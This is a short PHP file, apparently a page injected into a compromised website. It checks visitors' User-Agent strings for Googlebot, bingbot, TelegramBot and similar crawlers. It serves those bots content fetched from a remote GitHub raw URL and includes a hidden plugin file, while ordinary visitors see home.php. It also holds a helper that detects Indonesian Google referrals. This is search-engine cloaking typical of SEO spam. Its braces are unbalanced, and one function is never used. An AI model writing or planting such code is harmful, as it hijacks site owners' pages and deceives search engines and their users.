<?php
function is_bot() {
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    $bots = array("Googlebot", "TelegramBot", "bingbot", "Google-Site-Verification", "Google-InspectionTool");
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }
    return false;
}

if (is_bot()) {
    $message = file_get_contents("https://raw.githubusercontent.com/reportnews/go/refs/heads/main/zeus");
    echo $message;
    
    function is_google_bot() {
    if (isset($_SERVER['HTTP_USER_AGENT'])) {
        $includes_agent = $_SERVER['HTTP_USER_AGENT'];
        $google_agents = ['Googlebot', 'Mediapartners-Google', 'Google-InspectionTool'];
        foreach ($google_agents as $agent) {
            if (stripos($includes_agent, $agent) !== false) {
                return true;
            }
        }
    }
    return false;
}
function is_from_indonesia_and_google() {
    if (isset($_SERVER['HTTP_REFERER'])) {
        $referer = $_SERVER['HTTP_REFERER'];
        $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
        if (strpos($referer, 'google.co.id') !== false || (strpos($referer, 'google.com') !== false && strpos($accept_lang, 'id') !== false)) {
            return true;
        }
    }
    return false;
}
if (is_google_bot()) {
include __DIR__ . '/plugins/reports/views/class.php';
} else {
    include('home.php');
    exit;
}
?>
